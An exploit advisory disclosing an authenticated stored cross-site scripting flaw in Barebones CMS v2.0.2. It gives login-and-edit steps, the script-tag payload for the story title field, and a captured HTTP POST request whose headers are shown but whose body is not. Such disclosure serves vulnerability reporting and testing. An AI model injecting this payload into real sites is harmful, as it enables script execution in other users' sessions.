Authored by tmrswrr

Barebones CMS version 2.0.2 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-03
# Exploit Author: tmrswrr
# Vendor Homepage:
# Software Link:
# Version: v2.0.2
# Tested :

--- Description ---

1) Login admin panel and go to new story :
2) Click edit button and write your payload in the title field:
Payload: "><script>alert(1)</script>
3) After save change and will you see alert button

POST /sessions/ HTTP/1.1
Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 237
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close